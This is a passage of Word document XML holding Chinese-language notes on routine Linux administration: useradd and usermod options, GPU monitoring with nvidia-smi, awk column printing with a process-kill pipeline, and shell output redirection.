        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-r </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　建立系统帐号。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482D91DB" w14:textId="77777777" w:rsidR="00AF4E12" w:rsidRDefault="00AF4E12" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-s&lt;shell&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　指定用户登入后所使用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C8C2E0" w14:textId="1741637D" w:rsidR="005F0C94" w:rsidRDefault="00AF4E12" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-u&lt;uid&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　指定用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A295A8" w14:textId="565448C3" w:rsidR="005F0C94" w:rsidRDefault="005F0C94" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A024C09" w14:textId="0F067D4A" w:rsidR="00D00088" w:rsidRDefault="00D00088" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0701359C" w14:textId="4589F423" w:rsidR="00B82AE8" w:rsidRDefault="00B82AE8" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:t>serdel:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429534D4" w14:textId="6D68D94D" w:rsidR="00B82AE8" w:rsidRDefault="00B82AE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A6563D1" w14:textId="4EB34B13" w:rsidR="001B572F" w:rsidRDefault="001B572F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="125EBA50" w14:textId="27A2AA7A" w:rsidR="00945DA1" w:rsidRDefault="00945DA1" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:t>ser</w:t>
      </w:r>
      <w:r w:rsidR="005D71D9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mod</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F54054C" w14:textId="08E2B867" w:rsidR="001B572F" w:rsidRDefault="001B572F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39F5122D" w14:textId="77777777" w:rsidR="00C9553E" w:rsidRDefault="00C9553E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-c&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>备注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：修改用户帐号的备注文字；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C70DA9" w14:textId="77777777" w:rsidR="00C9553E" w:rsidRDefault="00C9553E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-d&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登入目录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：修改用户登入时的目录，只是修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中用户的家目录配置信息，不会自动创建新的家目录，通常和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一起使用；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3463C08C" w14:textId="77777777" w:rsidR="00C9553E" w:rsidRDefault="00C9553E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-m&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>移动用户家目录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>移动用户家目录到新的位置，不能单独使用，一般与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一起使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DE7E84" w14:textId="77777777" w:rsidR="00C9553E" w:rsidRDefault="00C9553E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-e&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有效期限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：修改帐号的有效期限；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA88EFA" w14:textId="77777777" w:rsidR="00C9553E" w:rsidRDefault="00C9553E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-f&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓冲天数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：修改在密码过期后多少天即关闭该帐号；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008204EF" w14:textId="77777777" w:rsidR="00C9553E" w:rsidRDefault="00C9553E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-g&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>群组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：修改用户所属的群组；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1703FEE5" w14:textId="77777777" w:rsidR="00C9553E" w:rsidRDefault="00C9553E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-G&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>群组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；修改用户所属的附加群组；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F566845" w14:textId="77777777" w:rsidR="00C9553E" w:rsidRDefault="00C9553E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-l&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>帐号名称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：修改用户帐号名称；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EACC37" w14:textId="77777777" w:rsidR="00C9553E" w:rsidRDefault="00C9553E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：锁定用户密码，使密码无效；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA90B18" w14:textId="77777777" w:rsidR="00C9553E" w:rsidRDefault="00C9553E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-s&lt;shell&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：修改用户登入后所使用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521B8740" w14:textId="77777777" w:rsidR="00C9553E" w:rsidRDefault="00C9553E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-u&lt;uid&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：修改用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC8F4D2" w14:textId="052082B0" w:rsidR="00C9553E" w:rsidRDefault="00C9553E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-U:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解除密码锁定。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E560088" w14:textId="3CEA56AE" w:rsidR="00945DA1" w:rsidRDefault="00945DA1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="050C1C25" w14:textId="3CA05D22" w:rsidR="00252EF6" w:rsidRDefault="00252EF6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FE6443E" w14:textId="77777777" w:rsidR="00252EF6" w:rsidRDefault="00252EF6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数表示附加，只和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -G </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数一同使用，表示将用户增加到组中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD4B440" w14:textId="77777777" w:rsidR="00252EF6" w:rsidRDefault="00252EF6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E13B7CA" w14:textId="77777777" w:rsidR="00252EF6" w:rsidRDefault="00252EF6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改用户家目录：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057EB799" w14:textId="77777777" w:rsidR="00252EF6" w:rsidRDefault="00252EF6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69561BC2" w14:textId="77777777" w:rsidR="00252EF6" w:rsidRDefault="00252EF6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>[root@node-1 ~]# useradd lutixiaya</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2773BDA4" w14:textId="77777777" w:rsidR="00252EF6" w:rsidRDefault="00252EF6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>[root@node-1 ~]# ls /home</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3F0017" w14:textId="77777777" w:rsidR="00252EF6" w:rsidRDefault="00252EF6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>lutixiaya</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F33F14" w14:textId="77777777" w:rsidR="00252EF6" w:rsidRDefault="00252EF6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>[root@node-1 ~]# usermod -md /data/new_home lutixiaya</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC7E278" w14:textId="77777777" w:rsidR="00252EF6" w:rsidRDefault="00252EF6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>[root@node-1 ~]# ls /home/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E47E757" w14:textId="77777777" w:rsidR="00252EF6" w:rsidRDefault="00252EF6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>[root@node-1 ~]# ls /data/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F21A2D6" w14:textId="0782D4F8" w:rsidR="00252EF6" w:rsidRDefault="00252EF6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>new_home</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E6B78B" w14:textId="391C06DE" w:rsidR="00252EF6" w:rsidRDefault="00252EF6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03405568" w14:textId="561939B1" w:rsidR="00252EF6" w:rsidRDefault="00252EF6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20C71D03" w14:textId="77777777" w:rsidR="00252EF6" w:rsidRDefault="00252EF6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DAE44F5" w14:textId="77777777" w:rsidR="00252EF6" w:rsidRDefault="00252EF6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51FE0DC0" w14:textId="77777777" w:rsidR="00945DA1" w:rsidRDefault="00945DA1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18C29685" w14:textId="6B0CE784" w:rsidR="001B572F" w:rsidRDefault="001B572F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="230" w:name="_Toc159779690"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>持续监控显卡占用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="230"/>
    </w:p>
    <w:p w14:paraId="691AAD3C" w14:textId="031CFC07" w:rsidR="001B572F" w:rsidRPr="001B572F" w:rsidRDefault="001B572F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00803055">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00803055">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>atch -n 1 nvidia-smi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DBB01F" w14:textId="77777777" w:rsidR="001B572F" w:rsidRDefault="001B572F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54527DE0" w14:textId="77777777" w:rsidR="00B82AE8" w:rsidRDefault="00B82AE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6415A1D7" w14:textId="64618CC8" w:rsidR="00A15875" w:rsidRDefault="00F265F1" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="231" w:name="_Toc159779691"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>wk</w:t>
      </w:r>
      <w:bookmarkEnd w:id="231"/>
    </w:p>
    <w:p w14:paraId="586A1A84" w14:textId="790B988E" w:rsidR="00A15875" w:rsidRDefault="00A15875" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CE880B0" w14:textId="59F89BA4" w:rsidR="00F265F1" w:rsidRDefault="00F265F1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打印某一列</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3177CB2E" w14:textId="096DF50C" w:rsidR="00F265F1" w:rsidRDefault="00F265F1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打印第二列（第一列是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37100E91" w14:textId="123D6FD9" w:rsidR="00F265F1" w:rsidRDefault="00F265F1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F265F1">
        <w:t>awk '{print $2}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BEDB08" w14:textId="562B24C9" w:rsidR="00F265F1" w:rsidRDefault="00F265F1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="502F0F2E" w14:textId="4D667ED3" w:rsidR="00941F06" w:rsidRDefault="00941F06" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701C39C5" w14:textId="31A20729" w:rsidR="00941F06" w:rsidRDefault="00941F06" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00941F06">
        <w:t>ps -ef | grep python | grep multiprocess | awk '{print $2}'| xargs kill</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EEE438" w14:textId="77777777" w:rsidR="00941F06" w:rsidRDefault="00941F06" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35D21096" w14:textId="7C32BC23" w:rsidR="00692565" w:rsidRDefault="00E4493D" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="232" w:name="_Toc159779692"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>标准输出和标准错误的</w:t>
      </w:r>
      <w:r w:rsidR="00692565">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重定向</w:t>
      </w:r>
      <w:bookmarkEnd w:id="232"/>
    </w:p>
    <w:p w14:paraId="7B2319B2" w14:textId="061E3975" w:rsidR="00692565" w:rsidRDefault="00737DC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&amp;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以将输出和错误重定向到一个文件，如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24266EB2" w14:textId="3D49C2FA" w:rsidR="00DD4AD1" w:rsidRDefault="00DD4AD1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD4AD1">
        <w:t>command &amp;&gt; output.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256124F9" w14:textId="77777777" w:rsidR="00DD4AD1" w:rsidRDefault="00DD4AD1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0798E1E3" w14:textId="76924D70" w:rsidR="00FC0C24" w:rsidRDefault="00FC0C24" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是一些</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&amp;&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样的操作，必须使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2&gt;&amp;1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABA430A" w14:textId="77777777" w:rsidR="00DD4AD1" w:rsidRDefault="00DD4AD1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C82667B" w14:textId="5EB1A92D" w:rsidR="00CA5CCB" w:rsidRDefault="0076634E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如重定向到一个文件或者是</w:t>
      </w:r>
      <w:r w:rsidR="00033CCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用管道符重定向的方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035A916A" w14:textId="15AE995A" w:rsidR="0078708D" w:rsidRDefault="006204DE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="006204DE">
        <w:t>command &gt; output.txt 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60153824" w14:textId="6A66C7BB" w:rsidR="0078708D" w:rsidRDefault="00C500C4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C500C4">
